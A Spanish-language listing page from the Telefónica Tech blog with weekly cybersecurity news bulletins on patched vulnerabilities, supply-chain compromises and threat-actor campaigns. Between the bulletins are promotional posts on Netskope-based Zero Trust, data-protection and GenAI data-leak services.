Cloud Híbrida
Ciberseguridad & NaaS
AI & Data
IoT y Conectividad
Business Applications
Intelligent Workplace
Consultoría y Servicios Profesionales
Pequeña y Mediana Empresa
Sanidad y Social
Industria
Retail
Turismo y Ocio
Transporte y Logística
Energía y Utilities
Telefónica Tech
Telefónica Tech es la compañía líder en transformación digital. La compañía cuenta con una amplia oferta de servicios y soluciones tecnológicas integradas de Ciberseguridad, Cloud, IoT, Big Data o Blockchain.
Boletín Semanal de Ciberseguridad, 6-12 septiembre
Parcheados nuevos fallos en Chrome 140 Google ha lanzado Chrome 140 (versiones 140.0.7339.80/81 para Windows y Mac, y 140.0.7339.80 para Linux), corrigiendo seis vulnerabilidades de seguridad, incluyendo la falla CVE-2025-9864 (CVSSv3 de 8.8 según CISA). Este fallo de tipo use-after-free en el motor JavaScript V8 permite ejecución remota de código, con riesgo de robo de datos o compromiso del sistema. También se solucionaron otras vulnerabilidades de severidad variada: CVE-2025-9865 (CVSSv3 de 5.4 según CISA, implementación inapropiada en la barra de herramientas), CVE-2025-9866 (CVSSv3 de 8.8 según CISA, problemas en el sistema de extensiones) y CVE-2025-9867 (CVSSv3 de 5.4 según CISA, fallo en el componente de descargas). Cabe señalar que no se han publicado PoCs ni exploits conocidos. Google recomienda actualizar Chrome inmediatamente para mitigar riesgos de ejecución remota y otras amenazas. Más info Ataque a NPM: comprometen paquetes con 2600 millones de descargas semanales para robar criptomonedas Un ataque a la cadena de suministro comprometió paquetes de NPM con más de 2600 millones de descargas semanales tras el robo de credenciales de un mantenedor mediante phishing. El desarrollador afectado, Josh Junon (qix), confirmó que cayó en un correo falso que simulaba ser de npmjs.com, lo que permitió a los atacantes tomar control de su cuenta y publicar versiones maliciosas. Estas versiones contenían código inyectado en los archivos index.js capaz de interceptar tráfico web y manipular APIs, redirigiendo transacciones de criptomonedas hacia monederos controlados por los atacantes. El malware se diseñó para actuar en navegadores, afectando Ethereum, Bitcoin, Solana, Tron, Litecoin y Bitcoin Cash. Entre los paquetes afectados se encuentran debug, chalk, strip-ansi y ansi-styles, todos con descargas masivas semanales. Este incidente se suma a una serie de ataques recientes contra librerías JavaScript populares. Más info Campaña GhostAction en GitHub: robo masivo de 3.325 credenciales en 817 repositorios GitGuardian ha descubierto GhostAction, una amplia campaña de ataque a la cadena de suministro que comprometió 817 repositorios en GitHub pertenecientes a 327 usuarios. Los atacantes inyectaron workflows maliciosos capaces de exfiltrar secretos a través de peticiones HTTP hacia un servidor controlado por ellos, logrando robar 3325 credenciales, entre ellas tokens de PyPI, npm, DockerHub, GitHub y claves de servicios en la nube. El ataque comenzó con el proyecto FastUUID, donde se introdujo un flujo fraudulento que sustrajo el token de PyPI, aunque no se detectaron publicaciones maliciosas en ese paquete. La investigación reveló un patrón repetido en múltiples repositorios públicos y privados, donde los atacantes identificaban secretos en workflows legítimos y los reenviaban al dominio bold-dhawan.45-139-104-115.plesk.page, activo hasta el mismo día de la detección. GitGuardian notificó a los afectados y a las plataformas implicadas (GitHub, PyPI y npm). Más info SAP corrige tres fallos críticos en NetWeaver y otras soluciones empresariales SAP ha publicado su boletín de seguridad de septiembre corrigiendo 21 vulnerabilidades en sus productos, tres de ellas de severidad crítica. La más grave, CVE-2025-42944 (CVSSv3 10.0 según proveedor), es un fallo de deserialización insegura en SAP NetWeaver ServerCore 7.50 que permite ejecución remota de comandos sin autenticación mediante el envío de objetos Java maliciosos. El segundo fallo crítico, CVE-2025-42922 (CVSSv3 9.9 según SAP), afecta a NetWeaver AS Java y permite a un atacante autenticado subir archivos arbitrarios, comprometiendo el sistema. El tercero, CVE-2025-42958 (CVSSV3 9.1 según fabricante), es una ausencia de validación de autenticación que habilita a usuarios privilegiados no autorizados a acceder, modificar o borrar datos sensibles. SAP recomienda actualizar a las versiones corregidas y aplicar mitigaciones de forma inmediata, ya que sus soluciones son ampliamente utilizadas en entornos críticos y representan un objetivo prioritario para los atacantes. Más info ChillyHell: backdoor modular para macOS logra evadir controles de Apple desde 2021 Jamf Threat Labs publicó un análisis en profundidad de ChillyHell, un backdoor modular para macOS activo desde 2021 y descubierto en VirusTotal. Este malware destaca por haber estado firmado por desarrollador y aprobado en el proceso de notarización de Apple, lo que le permitió pasar desapercibido durante años. Asociado inicialmente al grupo UNC4487 en un reporte privado de Mandiant, ChillyHell emplea varias técnicas avanzadas, como perfilado del sistema, persistencia mediante LaunchAgents, LaunchDaemons o inyección en perfiles de shell, timestomping y un ciclo principal de comunicación con C2 mediante HTTP o DNS. Entre sus módulos, incluye funciones de reverse shell, actualización automática, carga de binarios y fuerza bruta de credenciales, este último vinculado a ataques Kerberos. Además, abre un navegador con Google como señuelo para reducir sospechas. Tras estas revelaciones, Apple revocó los certificados de desarrollador empleados por los atacantes. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
12 de septiembre de 2025
Boletín Semanal de Ciberseguridad, 5 septiembre
WhatsApp parchea un fallo explotado en ataques 0-day WhatsApp ha corregido una vulnerabilidad crítica de tipo zero-click (CVE-2025-55177, CVSSv3 de 8.0 según CISA) que afectaba a sus clientes de mensajería en iOS anteriores a la versión 2.25.21.73, WhatsApp Business para iOS (v2.25.21.78) y WhatsApp para Mac (v2.25.21.78). El fallo, relacionado con la autorización incompleta en la sincronización de dispositivos vinculados, permitía a un atacante procesar contenido desde una dirección URL arbitraria en el dispositivo de la víctima sin interacción del usuario. Esta vulnerabilidad fue explotada junto con un fallo a nivel de sistema operativo en plataformas Apple (CVE-2025-43300, CVSSv3 de 8.0 según CISA) en ataques 0-day sofisticados dirigidos a usuarios concretos. Aunque no se han publicado PoCs o exploits públicos, WhatsApp ha emitido parches y recomienda realizar un restablecimiento de fábrica del dispositivo y mantener el sistema operativo actualizado. La campaña de spyware fue detectada por Donncha Ó Cearbhaill, jefe del Security Lab de Amnistía Internacional. Más info Ataque a la cadena de suministro expone datos de Salesforce Un ataque a la cadena de suministro contra la aplicación Salesloft Drift ha comprometido datos de Salesforce de grandes compañías de ciberseguridad como Zscaler, Palo Alto Networks, Cloudflare y SpyCloud. El ataque, atribuido al grupo UNC6395 y detectado por Google Threat Intelligence Group, se llevó a cabo entre el 8 y el 18 de agosto de 2025 mediante el robo de tokens OAuth. Los actores accedieron a entornos corporativos de Salesforce, exfiltrando credenciales sensibles como claves de AWS, contraseñas y tokens de bases de datos Snowflake. Entre los datos expuestos se encuentran nombres, correos electrónicos, teléfonos, cargos y detalles regionales, además de información comercial y de soporte en algunos casos. Salesforce y Salesloft revocaron todos los tokens comprometidos el 20 de agosto y retiraron temporalmente la aplicación de AppExchange. Las empresas afectadas confirmaron que el acceso se limitó a datos de Salesforce y que sus plataformas principales no se vieron comprometidas. Se recomienda revisar permisos de OAuth, auditar datos sensibles y reforzar los controles de acceso ante el riesgo de campañas de phishing y ataques de ingeniería social basados en la información filtrada. Más info Google desmiente que Gmail haya sufrido una brecha masiva de datos Google ha desmentido rotundamente los informes que afirmaban que había emitido una alerta global de seguridad para sus 2.500 millones de usuarios de Gmail, calificando dichas afirmaciones como “totalmente falsas”. La confusión provino de una interpretación errónea de un incidente limitado ocurrido en junio de 2025, cuando el grupo ShinyHunters accedió a una base de datos interna de Salesforce mediante técnicas de ingeniería social (vishing), obteniendo información básica de contacto empresarial, pero sin comprometer contraseñas ni datos sensibles. Aunque algunos medios lo presentaron como una brecha masiva de Gmail, Google aclaró que su infraestructura de correo no fue afectada y que sus sistemas bloquearían más del 99.9% de intentos de phishing y malware. La empresa recomienda el uso de passkeys y autenticación en dos pasos con apps o llaves físicas, y advierte sobre campañas similares dirigidas a diversos sectores. Más info Backdoors en Citrix Netscaler explotados desde mayo de 2025 El investigador Kevin Beaumont ha revelado que la vulnerabilidad CVE-2025-6543 (CVSSv3 9.2 según proveedor) en Citrix Netscaler fue explotada como 0-day desde mayo de 2025 contra gobiernos e instituciones legales, más de un mes antes de que existiera un parche. Los atacantes, presuntamente vinculados a Volt Typhoon, desplegaron webshells y crearon puertas traseras que persisten incluso tras aplicar actualizaciones. La campaña utilizó peticiones manipuladas para ejecutar un script Python que desplegaba un webshell en PHP cifrado. Además, los atacantes manipularon fechas de archivos para ocultar la intrusión. Citrix no informó públicamente sobre la existencia de estas puertas traseras, limitando la información a clientes bajo acuerdos de confidencialidad. Investigadores alertan que aún podrían existir sistemas comprometidos y recomiendan revisar logs de Netscaler, especialmente peticiones inusuales y modificaciones de archivos. Más info Corregidos 84 fallos de Android, cuatro críticos y dos activamente explotados Google ha publicado el parche de seguridad de septiembre de 2025 para Android, corrigiendo 84 vulnerabilidades, incluidas dos fallos explotados activamente: CVE-2025-38352 (CVSSv3 7.4, según CISA; condición de carrera en los temporizadores POSIX del kernel Linux, que permite escalada de privilegios y DoS) y CVE-2025-48543 (falla en Android Runtime que permite a apps maliciosas evadir el sandbox). También se solucionaron cuatro vulnerabilidades críticas, entre ellas CVE-2025-48539, una ejecución remota de código (RCE) en el componente SYSTEM que puede activarse vía bluetooth o WiFi sin interacción del usuario. Las otras tres (CVE-2025-21450, CVSSv3 9.1 según Qualcomm; CVE-2025-21483; CVE-2025-27034) afectan a componentes de Qualcomm, incluyendo corrupción de memoria y errores de validación de índices que permiten RCE en el módem baseband. Los parches están disponibles para Android 13 a 16, y se recomienda actualizar a los niveles 2025-09-01 o 2025-09-05. Los dispositivos con Android 12 o anterior deberían ser reemplazados o usar distribuciones alternativas con soporte activo. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
5 de septiembre de 2025
De las VPN a Zero Trust: el futuro del acceso remoto seguro
Las VPN clásicas han sido durante mucho tiempo la solución estándar para proporcionar acceso remoto seguro a los empleados y colaboradores externos. Sin embargo, su enfoque basado en la confianza implícita y la amplia exposición de la red interna las hace vulnerables ante las amenazas actuales. Además, las VPN suelen generar problemas de rendimiento y una complejidad operativa significativa. Para adaptarse a las necesidades de nuestros clientes, hemos incorporado la tecnología de Netskope a través de nuestras soluciones Security Edge y Security Edge Business como una alternativa completa para reemplazar las VPN tradicionales mediante Zero Trust Network Access (ZTNA) Next 360. Netskope ZTNA Next 360: reemplazo total de las VPN clásicas A diferencia de las VPN clásicas, que proporcionan acceso amplio a toda la red interna una vez autenticado el usuario, Netskope ZTNA Next 360 opera bajo un enfoque de confianza cero, otorgando acceso solo a las aplicaciones necesarias y aislando el resto de la infraestructura. Esto se traduce en: Mayor seguridad: Se minimiza la superficie de ataque y se evita el movimiento lateral de amenazas en la red. Rendimiento mejorado: Las conexiones se optimizan dinámicamente, evitando la latencia y los cuellos de botella típicos de las VPN. Simplificación operativa: No requiere la gestión de túneles VPN, facilitando la administración y el despliegue. Reemplazo total de la VPN: A diferencia de otras soluciones ZTNA, Netskope ZTNA Next 360 permite flujos de tráfico complejos, incluidos aquellos que requieren comunicaciones originadas desde el servidor hacia el cliente, ampliando las posibilidades para aplicaciones empresariales críticas. Beneficios de adoptar Security Edge de Telefónica Tech con Netskope Al adoptar Security Edge con Netskope, las organizaciones obtienen: Acceso remoto seguro: Basado en políticas de acceso granular, con autenticación continua y análisis de contexto. Mejor experiencia de usuario: Conexiones más rápidas y estables, sin necesidad de utilizar túneles VPN tradicionales. Flexibilidad en la gestión de tráfico: Soporte completo para flujos bidireccionales, cubriendo casos de uso complejos donde las VPN tradicionales aún se utilizaban por necesidad. Reducción de costes: Al eliminar hardware dedicado para las VPN y simplificar la administración, se optimizan los recursos IT y pasamos a una arquitectura altamente escalable. Caso de uso: Security Edge, acceso remoto Zero Trust con Netskope Una gran empresa del sector tecnológico, con numerosos colaboradores externos, migró de una infraestructura basada en VPN a Netskope ZTNA Next 360 dentro de Security Edge Business. Gracias a esta transición: Se redujeron en un 60% los incidentes de seguridad e incidencias de TI relacionadas con accesos remotos. La empresa consiguió una mejora del 45% en el rendimiento de sus aplicaciones empresariales, eliminando la latencia de las VPN. Se logró una visibilidad total sobre el tráfico de red, aplicando políticas avanzadas de seguridad y prevención de amenazas. La sustitución de las VPN cláscias por Netskope ZTNA Next 360, a través de Security Edge de Telefónica Tech, representa un salto cualitativo en seguridad y eficiencia para las empresas. No solo proporciona un acceso seguro y controlado a las aplicaciones críticas, sino que también elimina las limitaciones de las VPN, permitiendo una gestión más simple, menor coste operativo y una mayor protección frente a amenazas modernas. ■ Descubre cómo Security Edge puede transformar la seguridad de tu acceso remoto y llevar tu organización al siguiente nivel.
4 de septiembre de 2025
Boletín Semanal de Ciberseguridad, 23-29 agosto
Citrix corrige un fallo crítico RCE de NetScaler explotado en ataques 0-day Citrix ha corregido tres vulnerabilidades en NetScaler ADC y NetScaler Gateway, destacando la crítica CVE-2025-7775 (CVSSv4 de 9.2 según fabricante), una falla de desbordamiento de memoria que permite la ejecución remota de código sin autenticación y que fue activamente explotada como 0-day. Los otros dos fallos se corresponden con CVE-2025-7776 (CVSSv4 de 8.8 según Citrix), un desbordamiento de memoria que genera una condición DoS y CVE-2025-8424 (CVSSv4 de 8.7 según Citrix), causado por un control de acceso indebido en la interfaz de gestión. Las fallas afectan a versiones anteriores a 14.1-47.48, 13.1-59.22, 13.1-37.241-FIPS/NDcPP y 12.1-55.330-FIPS/NDcPP, por lo que Citrix recomienda actualizar lo antes posible el firmware. Si bien el fallo CVE-2025-7775 ha sido observado en ataques reales, no se han detectado exploits públicos. Más info Mustang Panda: sofisticadas tácticas de ciberespionaje en 2025 Picus Security ha expuesto las tácticas, técnicas y procedimientos del grupo APT Mustang Panda, activo desde 2014 y vinculado a ciberespionaje estatal chino. El grupo ataca entidades gubernamentales, ONGs y organizaciones religiosas en EE.UU., Europa y Asia mediante campañas de spear-phishing con señuelos geopolíticos y malware modular como PlugX, Poison Ivy y nuevas familias como FDMTP. En 2025, las autoridades desmantelaron más de 4.200 infecciones de PlugX distribuidas por USB, demostrando la persistencia del actor. Mustang Panda emplea tácticas como spear-phishing con archivos LNK, abuso de "msiexec.exe" para ejecución sin archivos y carga lateral de DLL. Para persistencia, utiliza claves de registro, tareas programadas y servicios maliciosos. En evasión, destacan inyecciones de procesos, robo de credenciales con volcado de LSASS y técnicas de descubrimiento con WMI y comandos del sistema. La recolección incluye capturas de pantalla, keylogging y compresión con WinRAR. Más info TAG-144 intensifica ataques contra entidades gubernamentales en Sudamérica TAG-144, también conocido como Blind Eagle o APT-C-36, ha desarrollado cinco campañas entre mayo de 2024 y julio de 2025, enfocadas en entidades gubernamentales de Colombia y, en menor medida, Ecuador, Chile y Panamá. Activo desde 2018, combina ciberespionaje y fraude financiero mediante troyanos de acceso remoto como AsyncRAT, REMCOS RAT, DcRAT, LimeRAT y XWorm. De acuerdo con Recorded Future, las campañas usan cadenas de infección multi-etapa y abusan de servicios legítimos como Discord, GitHub y Archive.org, además de técnicas de esteganografía. La infraestructura incluye VPS, IPs de ISPs colombianos, dominios dinámicos en duckdns.org y noip.com, y las VPN para ocultar operaciones. Algunas campañas aprovechan hosting gratuito, Telegram y páginas de phishing que suplantan bancos como Bancolombia. También se detectaron vínculos con Red Akodon mediante repositorios compartidos y cuentas comprometidas. Más info Parcheados nuevos fallos en Tableau Server y Desktop Salesforce ha corregido varias vulnerabilidades críticas en Tableau Server y Desktop. La más grave es CVE-2025-26496 (CVSSv3 de 9.6 según CISA), un fallo type confusión que permite la inclusión de código local y ejecución arbitraria en los módulos de carga de archivos. Otras fallas incluyen CVE-2025-26497 y CVE-2025-26498 (CVSSv3 de 7.7 según fabricante), que permiten la carga de archivos maliciosos en los módulos Flow Editor y establish-connection-no-undo, así como CVE-2025-52450 y CVE-2025-52451 (CVSSv3 de 8.5 según fabricante), que afectan a la API tabdoc mediante fallos de validación y traversal de rutas. Afectan a Tableau Server en versiones anteriores a 2025.1.4, 2024.2.13 y 2023.3.20, y las correspondientes de Tableau Desktop en Windows y Linux. Más info Actores comprometen Salesloft para robar tokens OAuth y acceder a Salesforce Salesloft confirmó una brecha en su integración SalesDrift con Salesforce, donde atacantes sustrajeron tokens OAuth y refresh entre el 8 y 18 de agosto de 2025. Con estas credenciales, los actores accedieron a instancias de Salesforce y ejecutaron consultas SOQL para extraer datos sensibles, incluyendo claves de AWS, contraseñas y tokens relacionados con Snowflake. Según Google Threat Intelligence, el grupo UNC6395 está detrás de la campaña, empleando infraestructura oculta en Tor, AWS y DigitalOcean, y herramientas personalizadas como Salesforce-Multi-Org-Fetcher. Aunque ShinyHunters se atribuyó inicialmente el ataque, no hay evidencia que lo vincule. Salesloft y Salesforce revocaron todos los tokens activos, solicitando a los clientes reconectar la integración. Se recomienda rotar credenciales, revisar logs y buscar posibles secretos expuestos, como claves AKIA, credenciales de Snowflake y las URL de acceso a VPN o SSO. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
29 de agosto de 2025
Protección y gobierno del dato en entornos Cloud, SaaS e híbridos con Security Edge y Netskope
En un entorno donde los datos se distribuyen entre aplicaciones SaaS, infraestructuras cloud y servicios locales, garantizar la seguridad y el gobierno del dato se ha convertido en un desafío complejo. Para abordar esta realidad, integramos la tecnología de Netskope, a través de nuestro servicio Security Edge, ofreciendo una solución completa que combina: DLP Inline para control en tiempo real del tráfico de datos. DLP vía API para visibilidad y protección de datos en aplicaciones SaaS. DSPM (Data Security Posture Management) para una gestión avanzada del dato en entornos Cloud, on-premise y arquitecturas híbridas. ■ Esta combinación permite unificar protección y gobierno del dato, abarcando desde aplicaciones en la nube hasta bases de datos empresariales locales, proporcionando visibilidad, control y cumplimiento normativo. Protección de Datos con DLP Inline y DLP vía API El servicio de protección del dato de Netskope, integrado en Security Edge, ofrece una defensa integral del dato mediante un enfoque doble: DLP Inline Inspección en tiempo real del tráfico de datos, evitando fugas de información y accesos no autorizados. Control granular de aplicaciones, bloqueando el uso de servicios no autorizados para datos sensibles. Visibilidad del Shadow IT, detectando aplicaciones y servicios utilizados sin control corporativo. DLP vía API Análisis y protección directa de los datos almacenados en aplicaciones SaaS, como Microsoft 365, Google Workspace o Salesforce. Detección de configuraciones inseguras y archivos compartidos de forma inadecuada, incluso de manera retrospectiva. Aplicación de políticas de seguridad adaptativas basadas en el contexto y la sensibilidad del dato. ■ Esta combinación permite una seguridad integral de los datos, desde el momento en que los datos se crean o transfieren hasta su almacenamiento en repositorios en la nube o aplicaciones SaaS. DSPM: Visibilidad y control esté donde esté el dato Data Security Posture Management (DSPM) de Netskope, como parte de Security Edge, ofrece un enfoque integral para la gestión del riesgo de los datos, proporcionando: Visibilidad completa de los datos sensibles en nubes públicas, privadas y servicios on-premises. Clasificación automatizada de la información según su criticidad y las regulaciones aplicables, como GDPR, PCI-DSS, HIPAA. Evaluación continua del riesgo y detección temprana de exposiciones accidentales o accesos indebidos. Protección de datos estructurados y no estructurados, cubriendo un amplio rango de fuentes de información. ■ Al abarcar tanto entornos cloud como infraestructuras locales, el DSPM incluido en nuestra solución Security Edge asegura que las organizaciones mantengan una postura de seguridad coherente sin importar dónde residan sus datos. Beneficios de Security Edge con Netskope para la protección y gobierno del dato Protección integral: Desde datos en tránsito hasta información almacenada en cualquier entorno. Cumplimiento normativo automatizado: Aplicando políticas de seguridad específicas para cada entorno y tipo de dato. Reducción del riesgo de fugas: Mediante la monitorización continua y la automatización de respuestas. Gestión simplificada: Una única plataforma para visibilidad, control y respuesta en toda la infraestructura de datos. Para las organizaciones que buscan mejorar las seguridad de sus datos sin afectar la operatividad y la productividad, la combinación de DLP Inline, DLP vía API y DSPM dentro de nuestra solución Security Edge de Telefónica Tech unifica protección y gobierno del dato. Ya sea en la nube, en aplicaciones SaaS o en servicios on-premise, el servicio asegura que los datos estén siempre protegidos, visibles y bajo control, cumpliendo con las normativas más exigentes como ISO 27001, NIS2 y DORA. ■ Descubre cómo nuestra solución Security Edge con Netskope puede fortalecer la seguridad y el gobierno del dato en tu empresa. Telefónica Tech El gobierno del dato: clave para una empresa data-driven 24 de julio de 2025 ___ Netskope forma parte de nuestro ecosistema de partners.
27 de agosto de 2025
Boletín Semanal de Ciberseguridad, 16-22 agosto
Parcheada una vulnerabilidad crítica en Cisco FMC Cisco ha advertido de una vulnerabilidad de ejecución remota de código (RCE) de máxima gravedad registrada como CVE-2025-20265 (CVSSv3 de 10.0 según Cisco) en el subsistema RADIUS de su software Secure Firewall Management Center (FMC), que afecta a las versiones 7.0.7 y 7.7.0 con autenticación RADIUS habilitada para la interfaz web o SSH. Descubierta internamente por el investigador Brandon Sakai, la falla se debe a un manejo inadecuado de la entrada de usuario durante la fase de autenticación, lo que permite a un atacante no autenticado inyectar comandos de shell con privilegios elevados. Cisco ha publicado actualizaciones gratuitas a través de sus canales habituales para clientes con contrato de servicio válido; como mitigación alternativa, se recomienda deshabilitar la autenticación RADIUS y usar cuentas locales, LDAP externo o SAML SSO. Hasta la fecha no se conocen PoC, exploits públicos ni evidencia de explotación activa del fallo en entornos reales. Más info Warlock Ransomware explota vulnerabilidades en SharePoint Los investigadores de Trend Micro han revelado que el grupo de ransomware Warlock está explotando vulnerabilidades críticas en Microsoft SharePoint on-premises. Warlock, que debutó en junio en el foro ruso RAMP y se sospecha que es un derivado de Black Basta, ha estado detrás de ataques contra organismos públicos y privados en varios países. En concreto, la campaña observada aprovecha fallos como CVE-2025-49704 (CVSSv3 8.8 según proveedor) y CVE-2025-49706 (CVSSv3 6.5 según proveedor). Los atacantes logran ejecución remota de código en servidores SharePoint y, una vez dentro, escalan privilegios mediante la creación de GPOs, habilitan cuentas invitadas como administradores locales y utilizan herramientas como Mimikatz para robar credenciales. Posteriormente, distribuyen el ransomware a través de SMB y establecen persistencia mediante túneles de Cloudflare. Trend Micro destacó que Warlock comparte código con LockBit 3.0 tras la filtración del builder en 2022, lo que ha facilitado la proliferación de variantes. El grupo también emplea un malware denominado Trojan.Win64.KILLLAV.I para intentar desactivar productos de seguridad. Más info Descubierta vulnerabilidad crítica en FortiSIEM ya explotada en ataques Investigadores de watchTowr Labs han descubierto una vulnerabilidad crítica de inyección de comandos preautenticación en Fortinet FortiSIEM, identificada como CVE-2025-25256 (CVSSv3 9.8 según proveedor). El fallo reside en el componente phMonitor, encargado de supervisar procesos de la plataforma, y afecta a todas las versiones entre la 5.4 y la 7.3.1. La vulnerabilidad permite a atacantes ejecutar comandos arbitrarios sin credenciales mediante el envío de cargas XML especialmente manipuladas. Fortinet ha confirmado que la vulnerabilidad ya está siendo explotada en el mundo real, lo que incrementa su gravedad. Las versiones corregidas incluyen la 7.3.2, 7.2.6, 7.1.8, 7.0.4 y 6.7.10, mientras que las 6.6 y anteriores requieren migración completa a releases más recientes. Dada la naturaleza crítica de FortiSIEM como sistema central en centros de operaciones de seguridad (SOC), la explotación podría cegar a las organizaciones frente a ataques activos. Se recomienda a los equipos de seguridad inventariar urgentemente sus despliegues y aplicar las actualizaciones o migraciones correspondientes, además de monitorizar posibles intentos de explotación. Más info Nueva variante de Noodlophile distribuida a través de campañas de spear-phishing Investigadores de Morphisec han alertado de una nueva variante del infostealer Noodlophile Stealer distribuida mediante campañas de spear-phishing que alegan infracciones de derechos de autor en páginas específicas de Facebook. Este malware es capaz de exfiltrar credenciales y datos de navegadores, recopilar información del sistema y ejecutar payloads dinámicos en memoria al sideloadear DLLs maliciosas mediante binarios legítimos como Haihaisoft PDF Reader. La operación, activa desde hace más de un año y vinculada a actores de amenazas no identificados, emplea enlaces de Dropbox, técnicas de evasión como LOLBins y archivos codificados en Base64, y utiliza descripciones de grupos de Telegram como dead-drop resolver para dificultar la detección. Asimismo, se ha dirigido a empresas en EE UU, Europa, países bálticos y la región Asia-Pacífico. Se recomienda reforzar filtros de correo, desplegar autenticación multifactor, concienciar a los usuarios y adoptar soluciones EDR y control de aplicaciones para bloquear cargas dinámicas de payloads. Más info Nueva vulnerabilidad 0-day en Apple explotada en ataques dirigidos Apple ha lanzado actualizaciones de emergencia para corregir la vulnerabilidad crítica CVE-2025-43300, sin CVSS asignado por el momento, un fallo de escritura fuera de límites en el framework Image I/O que permitiría la ejecución remota de código al procesar imágenes maliciosas. Según la compañía, la vulnerabilidad ya habría sido explotada en ataques altamente sofisticados contra individuos específicos. El problema se ha solucionado mediante una mejora en las comprobaciones de límites, incluida en iOS 18.6.2, iPadOS 18.6.2 y 17.7.10, así como en macOS Sequoia 15.6.1, Sonoma 14.7.8 y Ventura 13.7.8. El fallo afecta a una amplia gama de dispositivos, desde iPhone XS en adelante, múltiples generaciones de iPad, y Macs con las versiones mencionadas de macOS. Aunque Apple no ha revelado detalles sobre los ataques ni atribuido su descubrimiento a un investigador concreto, recomienda actualizar inmediatamente. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
22 de agosto de 2025
Seguridad y cumplimiento en aplicaciones de IA Generativa como ChatGPT y DeepSeek
La seguridad y el cumplimiento normativo en aplicaciones de IA Generativa como ChatGPT y DeepSeek se han convertido en una prioridad crítica para las empresas que buscan aprovechar estas tecnologías sin comprometer la protección de datos. El riesgo de fuga de información sensible y el incumplimiento de normativas como GDPR, HIPAA o ISO 27001 obligan a implementar soluciones avanzadas que ofrezcan control y visibilidad total sobre el uso de GenAI. Enfoques como CASB Inline, DLP y CASB API, permiten que la innovación en IA se desarrolle en un marco seguro, conforme y alineado con las políticas corporativas. ■ La seguridad y cumplimiento en aplicaciones de IA Generativa consisten en aplicar controles y políticas para proteger datos sensibles y cumplir normativas como GDPR o ISO 27001 al usar herramientas como ChatGPT y DeepSeek. Se logra mediante tecnologías como CASB, DLP y controles API que aseguran un uso responsable y seguro de la GenAI. ______ El auge de las aplicaciones de IA Generativa (GenAI), como DeepSeek y ChatGPT, ha transformado la forma en la que las organizaciones manejan la información. Sin embargo, el uso no controlado de estas herramientas puede exponer a las empresas a riesgos significativos de seguridad, especialmente en cuanto a la protección de datos sensibles y al cumplimiento normativo. Para abordar estos desafíos, nuestra solucion Security Edge de Telefónica Tech, junto con la tecnología de Netskope, ofrece un enfoque integral de seguridad y control de datos, combinando CASB (Cloud Access Security Broker) Inline, DLP (Data Loss Prevention ) y CASB API. Esto, como veremos más adelante, asegura un gobierno unificado del dato en el uso de aplicaciones GenAI. Desafíos de seguridad con aplicaciones IA Generativa Las aplicaciones de IA Generativa facilitan la automatización de tareas, la generación de contenido y el análisis avanzado de datos, pero también presentan riesgos importantes: Fuga de datos sensibles: los empleados pueden, sin darse cuenta, compartir información confidencial con herramientas externas. Pérdida de control sobre los datos: las aplicaciones GenAI pueden almacenar y utilizar información introducida, como por ejemplo el código fuente, lo que representa un riesgo de exposición. Cumplimiento normativo: el uso no regulado de estas herramientas puede violar normativas como el GDPR, HIPAA y PCI-DSS, importantes también para el cumplimiento de NIS2, DORA e ISO 27001. Soluciones de Security Edge con Netskope para GenAI: CASB Inline, DLP y CASB API Security Edge, en colaboración con Netskope, proporciona una solución integral para la protección de datos sensibles al utilizar aplicaciones como DeepSeek y ChatGPT: CASB Inline + DLP: protección en tiempo real Monitorización del tráfico en tiempo real: CASB (Cloud Access Security Broker) Inline de Netskope permite inspeccionar el tráfico en tiempo real, asegurando que no se transfieran datos sensibles a aplicaciones GenAI sin la debida autorización. Protección de información: DLP (Data Loss Prevention) Inline aplica políticas de seguridad para evitar la exfiltración de datos sensibles, bloqueando subidas y descargas que no cumplan con las políticas corporativas, sin tener que clasificar la información. Control adaptativo: proporciona acciones automatizadas como bloquear, permitir con advertencia o aplicar coaching al usuario en tiempo real, garantizando que las interacciones con GenAI sean seguras y conformes a las políticas de la empresa. CASB API para control específico en ChatGPT Visibilidad completa: CASB (Cloud Access Security Broker) API de Netskope se integra con la API de de ChatGPT Enterprise, ofreciendo control directo sobre las interacciones con esta herramienta, incluyendo el análisis de conversaciones, la aplicación de políticas de DLP y la detección de comportamientos anómalos. Control de accesos y políticas de seguridad: Permite definir políticas de acceso específicas, asegurando que solo los usuarios autorizados puedan utilizar ChatGPT y evitando el uso indebido de datos sensibles. Cumplimiento normativo asegurado: La solución ofrece plantillas de cumplimiento preconfiguradas, permitiendo a las organizaciones alinearse fácilmente con las normativas vigentes. Beneficios clave de la solución de Netskope en Security Edge de Telefónica Tech Protección integral: asegura los datos en tránsito y en uso durante las interacciones con aplicaciones GenAI. Cumplimiento normativo: facilita el cumplimiento de regulaciones con plantillas específicas para GDPR, HIPAA, PCI-DSS; para cumplir con normativas como ISO27001, NIS2 y DORA. Experiencia de usuario segura: el coaching en tiempo real educa a los empleados sobre mejores prácticas al interactuar con DeepSeek, ChatGPT y otras herramientas GenAI. Reducción de riesgos: identificación temprana de potenciales incidentes de seguridad, bloqueando actividades de alto riesgo antes de que afecten al negocio. El uso de DeepSeek, ChatGPT y otras herramientas de Inteligencia Artificial Generativa puede ser una ventaja competitiva, siempre y cuando se utilicen de manera segura y conforme a las normativas. La combinación de CASB Inline, DLP y CASB API dentro de nuestra solución Security Edge de Telefónica Tech, junto a la tecnología de Netskope, ofrece a las empresas una protección robusta, permitiendo innovar con confianza en la era de la GenAI. ■ Descubre cómo Security Edge y Netskope pueden ayudarte a implementar un control seguro y efectivo sobre las aplicaciones GenAI en tu empresa. Más información → ___ Netskope forma parte de nuestro ecosistema de partners.
19 de agosto de 2025
Boletín Semanal de Ciberseguridad, 11-15 agosto
